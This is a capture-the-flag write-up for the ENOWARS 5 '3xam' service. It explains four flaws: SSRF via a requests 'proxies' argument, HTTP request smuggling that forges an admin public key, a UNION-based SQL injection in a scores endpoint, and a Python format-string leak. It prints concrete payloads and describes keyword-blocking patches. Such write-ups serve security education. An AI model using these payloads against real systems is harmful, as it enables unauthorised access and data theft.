# ENOWARS 5 - 3xam

3xam is a Python-based service with three relevant components (source):

• backend: this is actually just a server-side request stub which relies on the Noise Protocol and WebSockets (to make traffic analysis a bit harder).
• backend_internal: the actual backend, which can only be communicated with through the server-side request stub.
• logger: a logging backend which stores all the logged data of all components in SQLite databases.

# Noise and its public keys

When we look at the source of the backend_internal service, we notice that there are some default user accounts being added. They are added together with public keys, which actually refer to the public keys of the checker (at least for the one with the admin privileges). The public key is extracted from the handshake in backend and always sent along with the request towards backend_internal. The relevant code of the SSR (the server-side request stub) looks as follows:
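
The original listing is not reproduced here (the line numbers in the following paragraphs refer to it), but the gist of the stub can be sketched roughly like this; all function and variable names are my own assumptions:

```python
from urllib.parse import urlparse

ALLOWED_HOST = "backend_internal"  # assumed constant name

def build_request_kwargs(parsed: dict, pubkey: str) -> dict:
    """Build the kwargs for session.request() from the client payload.

    `parsed` stands in for the data received over the Noise-enabled
    WebSocket; every key in it ends up as a keyword argument.
    """
    kwargs = dict(parsed)  # the attacker controls ALL keys in here
    # the public key is set AFTER parsing, so it cannot be overridden
    kwargs.setdefault("headers", {})["X-PubKey"] = pubkey
    url = urlparse(kwargs.get("url", ""))
    # only http://backend_internal/... is accepted as a target URL
    if url.scheme != "http" or url.hostname != ALLOWED_HOST:
        raise ValueError("forbidden URL")
    return kwargs
    # the real service then does something like:
    #   await session.request(**kwargs)
```

Because the kwargs dictionary is built from the raw client payload, extra keys such as `proxies` survive the URL check untouched and reach `session.request` as keyword arguments.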

There are a couple of things to note here. First, parsed (line 10) refers to the data that was sent over the Noise-enabled WebSocket. In lines 17 and 18, the service checks that the URL cannot point to arbitrary servers, but must be targeted towards backend_internal through http. However, looking at line 10, we see that based on our input, we can add arbitrary keys to the dictionary. In line 21, these are then unpacked and passed to session.request as parameters.

# Bug 1: proxies

If we pay close attention to the signature of session.request, we note that one of the arguments is called proxies. This can be used to configure proxies to be used by requests (see documentation). These include HTTP proxies, which you talk to almost like a regular HTTP server. So, while we cannot set the hostname of a URL to something other than backend_internal, we can instead use a proxy. Now, what can we do with this?

## Quick dive into the logger

The logger backend (running on http://logger:80) has just a single relevant endpoint for us: if we GET http://logger:80/backend_internal, we receive all log entries that belong to the backend_internal component. As we could see from looking at the functionality, the gameserver stores a flag through a syshealth feature (it is not too important what this does, because it is just meant to fake some benign functionality and write a flag to the log). Notably, though, if we can get access to the logger, we can read those flags.

## The actual exploit

Now that we have some target we can use, let’s build an exploit. We can just use the trick with the proxies to provide a URL that passes the checks in line 17 and 18, but in fact connects to the logger endpoint:
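
The exploit message itself is not reproduced here; it could look roughly like this (the field names are assumptions based on the description of the SSR above):

```python
import json

# Hypothetical exploit message: the URL satisfies the scheme/host
# check, but the extra 'proxies' key makes requests connect to the
# logger instead of backend_internal.
payload = {
    "method": "GET",
    "url": "http://backend_internal",         # passes the URL checks
    "proxies": {"http": "http://logger:80"},  # ...but talks to the logger
}
message = json.dumps(payload)  # sent over the Noise-enabled WebSocket
```

With an HTTP proxy configured, requests opens a TCP connection to logger:80 and puts the absolute URL into the request line, so a naive parser on the logger side ends up matching the backend_internal component name.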

This gave us a total of 12741 valid flags throughout the entire CTF.

# Bug 2: Unintended HTTP Request Smuggling

HTTP Request Smuggling (or HRS for short) is usually an attack in which we are able to confuse front- and back-end servers, such that the front-end only sees one HTTP request, but the backend sees (at least) two. PortSwigger have a nice explanation on the subject.

## Some background

Before we get to the exploit, we need to discuss some basic functionality in the backend_internal service, starting in line 35 of backend_internal/app/resources/user.py:
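
The snippet itself is missing from this page (the line numbers in the next paragraphs refer to the original code); its logic can be sketched as follows, with names and constant values being guesses:

```python
USER_TYPE_ADMIN = 1   # guessed value; 1 matches the smuggled request below
USER_TYPE_NORMAL = 3  # value is a guess

USERS = {}  # pubkey -> user dict, standing in for the real database

def get_current_user(headers: dict) -> dict:
    """Look up the caller by the X-PubKey header set by the SSR.

    If no user with that public key exists yet, one is created on the
    fly with default (normal) privileges.
    """
    pubkey = headers["X-PubKey"]
    user = USERS.get(pubkey)
    if user is None:
        user = {"pubkey": pubkey, "user_type_id": USER_TYPE_NORMAL}
        USERS[pubkey] = user
    return user

def add_user(headers: dict, new_user: dict) -> dict:
    # only admins may create users with arbitrary types
    if get_current_user(headers)["user_type_id"] != USER_TYPE_ADMIN:
        raise PermissionError("admin only")
    USERS[new_user["pubkey"]] = new_user
    return new_user
```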

Note that in line 3 of the snippet get_current_user is called. This uses the X-PubKey header to get the current user’s public key and searches in the database for a user with that key. If none is found (e.g., because we have not yet registered), a user is generated with that public key (line 14) and the default privileges, namely USER_TYPE_NORMAL (line 5).

If we want to add another user, we need to be of type USER_TYPE_ADMIN (line 8). However, by default, only the gameserver checker knows the necessary key pair. If we somehow could manage to produce a request to this endpoint with the gameserver’s X-PubKey, this would enable us to add arbitrary users with arbitrary types. Notably, a user with USER_TYPE_ADMIN has three important capabilities: they can directly use admin functionality to get the logs (which we already exploited through the proxies), they can see the information (including the name) of arbitrary users (regular users can only see usernames for “normal” users), and they can see the provided answers to questions in the exams. So, if we can become admin, we can actually exploit all three flag stores at the same time.

The “authentication” in this service is done only with the public key used in the Noise protocol. In line 12 of the code at the beginning of this post, we can see that the public key is set after our input is parsed, i.e., we cannot overwrite X-PubKey with something of our choice. However, if we somehow manage to smuggle a second request, this is entirely controlled by us. Together with the functionality of registering users with arbitrary privileges (if only we have the correct X-PubKey set), we can now exploit this.

## The actual exploit

There are usually two ways in which HTTP servers know how long a request is: the Content-Length field indicates how many bytes should be read, and, alternatively, Transfer-Encoding: chunked means that we send chunked data. This basically works as follows:

• Send the hex-encoded number of bytes in the next chunk on a single line, followed by \r\n.
• Send the corresponding number of bytes, followed by \r\n.
• Go to step 1. Once we are done sending data, send a final 0\r\n followed by an empty line (\r\n).
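
The framing described above can be sketched as a tiny encoder:

```python
def chunked_encode(*chunks: bytes) -> bytes:
    """Encode byte chunks using HTTP/1.1 chunked transfer framing."""
    out = b""
    for chunk in chunks:
        # hex length line, then the chunk itself, each CRLF-terminated
        out += format(len(chunk), "x").encode() + b"\r\n" + chunk + b"\r\n"
    # the zero-length chunk terminates the body
    return out + b"0\r\n\r\n"
```

For example, `chunked_encode(b"hello")` yields `b"5\r\nhello\r\n0\r\n\r\n"`.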

The HTTP standard mandates that if Transfer-Encoding: chunked is present, the server must disregard Content-Length. So, all we need to do (remember: we control basically everything sent through session.request in line 21) is to prepare a request which will be interpreted as two requests by backend_internal. Our payload for that is pretty straightforward:
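
The exploit code itself is not reproduced here; a hedged sketch of how the smuggled body might be assembled (the helper name and message layout are mine, derived from the dump below):

```python
import json

def build_smuggled_body(our_pubkey: str, admin_pubkey: str, name: str) -> bytes:
    """Assemble the body of the outer GET request: a terminating empty
    chunk, followed by a complete second request that backend_internal
    will parse on its own once the first one is finished."""
    inner_json = json.dumps(
        {"pubkey": our_pubkey, "name": name, "user_type_id": 1}
    ).encode()
    inner = (
        b"POST /users HTTP/1.1\r\n"
        b"X-PubKey: " + admin_pubkey.encode() + b"\r\n"
        b"Host: backend_internal\r\n"
        b"Content-Length: " + str(len(inner_json)).encode() + b"\r\n"
        b"Content-Type: application/json\r\n"
        b"\r\n" + inner_json
    )
    # '0\r\n\r\n' ends the chunked outer body; everything after it is
    # read as the next request on the kept-alive connection
    return b"0\r\n\r\n" + inner
```

The outer request’s headers (Transfer-Encoding: chunked, Connection: Keep-Alive, and the inflated Content-Length) would be supplied via the headers key of the request we send through the SSR.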

In essence, we first make a GET request to the /users endpoint. We do not really care about the result of that, because our goal is merely to smuggle the second request. The data being sent to backend_internal looks something like this:

GET /users HTTP/1.1
Host: backend_internal
Transfer-Encoding: chunked
Connection: Keep-Alive
X-PubKey: <our_pubkey>
Content-Length: <howeverLongTheTotalRequestIs>

0

POST /users HTTP/1.1
X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=
Host: backend_internal
Content-Length: <inner_length>
Content-Type: application/json

{"pubkey": <our_pubkey>, "name": <random_user>, "user_type_id": 1}


The backend_internal observes the first request, ignores the Content-Length (since we have chunked encoding) and parses the empty chunk. Since we explicitly tell it to keep the connection open (Connection: Keep-Alive), it now parses the remaining data, which is our smuggled request. While we cannot see the result of this request, we don’t care because the state-changing action has taken place and our account is now an admin user.

With this, we can now access /questions/1 to see all answers (aka flags), use /users/<id> to learn the names of all users (aka flags), and also access the admin log backend /admin/logs?tag=/app/resources/admin/syshealth&match=ENO in the following couple of requests :-)

According to the organizers, this was unintended, but it still allowed us to get first blood on all flag stores (basically at the same time).

# Bug 3: SQL injection in scores

Full disclosure: I did not find this myself, but saw an attack against us. I pimped the exploit to steal flags from two stores, though ;-)

The entire database management is done through a custom ORM (backend_internal/app/orm/model.py). Rather than using prepared statements or the like, the service uses string formatting to build up the query. In backend_internal/app/resources/scores.py, there is attacker-controlled input in the count parameter. The relevant lines of code are as follows:
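
The listing is missing from this page (the line numbers in the next paragraph refer to it), but the vulnerable pattern can be demonstrated in miniature; table and column names are guesses, and since the real service appears to use MySQL-style `#` comments, this SQLite stand-in uses `--` instead:

```python
import sqlite3

# in-memory stand-in for the service database
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users  (id INTEGER PRIMARY KEY, name TEXT, user_type_id INTEGER);
    CREATE TABLE scores (id INTEGER, user_id INTEGER, exam_id INTEGER, points INTEGER);
    INSERT INTO users  VALUES (1, 'admin', 1), (2, 'ENO_FLAGUSER', 2);
    INSERT INTO scores VALUES (1, 1, 1, 50);
""")

def find_scores(count):
    # vulnerable: the GET parameter is formatted straight into the SQL
    query = (
        "SELECT * FROM (SELECT id, user_id, exam_id, points "
        f"FROM scores WHERE exam_id = 1 LIMIT {count})x"
    )
    return conn.execute(query).fetchall()

# the injected count closes the subquery early and appends a UNION
rows = find_scores(
    "1)x UNION SELECT NULL, id, NULL, 100 FROM users WHERE user_type_id = 2 --"
)
```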

As we can see in line 10, models.Score.find is invoked with limit=count, whereas count originates from the GET parameter count (line 6). Since this is just used in string formatting (not a prepared statement), we can inject a UNION SELECT into the statement. The original attack against us looked something like this:

/exams/1/scores?count=123)x+UNiON+SeLECT+NULL,+id,+NULL,+100+from+users+whEre+user_type_id=2+%23


The resulting query looked as follows:
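
The query listing is likewise missing from this page; judging from the injection string, it plausibly had a shape like the following (table and column names are guesses; everything after the MySQL-style # comment is ignored):

```
SELECT * FROM (SELECT id, user_id, exam_id, points FROM scores
    WHERE exam_id = 1 LIMIT 123)x
UNiON SeLECT NULL, id, NULL, 100 from users whEre user_type_id=2 #)x
```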

Importantly, the result of this query is not just output, but instead passed through Python once more in lines 13 and 14 of the above listing. This snippet takes the user_id coming from the database query and then “resolves” the username. Since the query above returns the IDs of all users with user_type_id 2, resolving them yields all flags added by the gameserver for that flag store.

The added benefit of the SQL injection is that we can actually exploit it to also get the flags from the answers (which I have not observed being used against us). Specifically, as long as we select a valid user ID, the Python code shown above does not throw an error. At the end of the get function, we receive the list of users and their scores. The score, however, is not checked to be of type integer. Hence, we can expand the exploit and also do the following UNION SELECT:
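
That payload is not shown on this page; following the same pattern as the first injection, it would look something like this (the answers table and column names are guesses):

```
/exams/1/scores?count=123)x+UNiON+SeLECT+NULL,+1,+NULL,+answer+from+answers+%23
```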

Note that the last field is the score, which is output. We just always select user_id as 1, since this is the admin account we know of. So, the output of the request then contains a lot of entries for the user admin, every time with a different flag from the answers as the score.

# Bug 4: Format string

The final (?) bug is of yet another type, namely a format string. When submitting an answer to a question, we get feedback from the service whether our answer was correct or not. This happens in backend_internal/app/resources/exam_questions.py. The notable part of the functionality is shown below:
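
The snippet is missing from this page (the line numbers in the next paragraph refer to it); the double-formatting pattern it contains can be sketched as follows, with class and variable names being mine:

```python
class Question:
    def __init__(self, answers):
        self.answers = answers  # the correct answers (i.e., the flags)

class Submission:
    def __init__(self, question, answer):
        self.question = question
        self.answer = answer

def grade(submission, sanitized_answer: str) -> str:
    """Sketch of the vulnerable flow: the (insufficiently) sanitized
    answer is formatted into a message template, and the result is
    then format()ed AGAIN with the submission object in scope."""
    success_message = f"Correct! You answered: {sanitized_answer}"
    fail_message = f"Wrong! You answered: {sanitized_answer}"
    correct = submission.answer in submission.question.answers
    osd_message = success_message if correct else fail_message
    # second formatting pass: surviving {...} placeholders get resolved
    return osd_message.format(submission=submission)
```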

We see that our answer (line 7) is seemingly sanitized and then used in the generation of success_message and fail_message. Depending on whether our answer was correct, the osd_message variable is assigned to either one of them. Notably, formatting is invoked twice. That means, if we can sneak something like {submission} into the osd_message used in line 21, this will be resolved by Python when formatting the message. However, as line 7 shows, our data is sanitized and all relevant chars are stripped, right?

Well, no :-) While strip is a built-in on Python strings, this is really a custom function called strip:
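
The snippet is missing here; reconstructed from the description below (the exact set of “dangerous” characters is a guess):

```python
def strip(data: str) -> str:
    """Buggy sanitizer: str.replace's third argument is the maximum
    number of replacements, so True (which equals 1) removes only the
    FIRST occurrence of each dangerous character."""
    for char in "{}.":  # assumed set of dangerous characters
        data = data.replace(char, "", True)
    return data
```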

This invokes string.replace with the third parameter set to True. Unfortunately, replace has a third parameter, which is the maximum number of replacements. True translates to 1, i.e., this replaces the first occurrence of each of the dangerous characters… but that is it. Because the custom ORM adds some weird relations between the objects, we can just ask the service to format {submission.question.answers} to retrieve all answers for a particular question. Since the gameserver always answers question 1, we just have to provide a wrong answer to the first question and send {}.{submission.question.answers}. The first three “dangerous” characters are stripped, so we get our desired format string. In yet another full disclosure, I found this bug an hour before the end of the CTF, but managed to overcomplicate things (attempting to import os as you would in a template injection). The service author let us know after the CTF how easy it actually was :-(

# Summary, Patches, and a shitload of boilerplate code

Really fun service, for which we got first blood on all stores because of the unintended HRS flaw. I did not actually modify any of the functionality of backend_internal. Instead, I just made sure that backend would not even handle requests which carry keywords like proxies, union, or chunked :-)

## All exploits combined

Here is a Python file with all the boilerplate code, which is frankenstein’ed together, so no guarantee it actually works ;-)